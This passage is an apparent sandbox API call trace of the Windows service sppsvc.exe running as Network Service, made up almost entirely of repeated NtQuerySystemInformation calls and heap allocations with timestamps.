"C:\\WINDOWS\\system32\\sppsvc.exe" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000793bd" [0xc000000f], "LOCAL" [0x7] Thread: id = 633 os_tid = 0xdec Thread: id = 634 os_tid = 0x1080 [0282.748] GetProcessHeap () returned 0x269489b0000 [0282.748] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x230) returned 0x26948a00060 [0282.749] GetProcessHeap () returned 0x269489b0000 [0282.749] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x26949c6cc10 [0282.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e160, Length=0x50, ResultLength=0x0) [0282.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e160, Length=0x50, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e160, Length=0x50, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e050, Length=0x50, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e050, Length=0x50, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e050, Length=0x50, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207e050, Length=0x50, ResultLength=0x0) [0282.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x38, ResultLength=0x0) [0282.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ddb0, Length=0x28, ResultLength=0x0) [0282.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ddb0, Length=0x28, ResultLength=0x0) [0282.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ddb0, Length=0x28, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ddb0, Length=0x28, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207de20, Length=0x28, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x38, ResultLength=0x0) [0282.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dea0, Length=0x28, ResultLength=0x0) [0282.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dea0, Length=0x28, ResultLength=0x0) [0282.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x20, ResultLength=0x0) [0282.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x20, ResultLength=0x0) [0282.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x20, ResultLength=0x0) [0282.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x20, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x38, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207df80, Length=0x38, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207de00, Length=0x20, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd90, Length=0x20, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd90, Length=0x20, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0282.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0282.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x50, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x50, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x50, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x50, ResultLength=0x0) [0282.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0282.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0282.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0282.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0282.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0282.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0282.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0282.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0282.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0282.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0282.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0282.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0282.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0282.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0282.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0282.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0282.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0282.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0282.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0282.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0282.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0282.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0282.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0282.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0282.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0282.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0282.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0282.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0282.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0282.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0282.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0282.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0282.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, 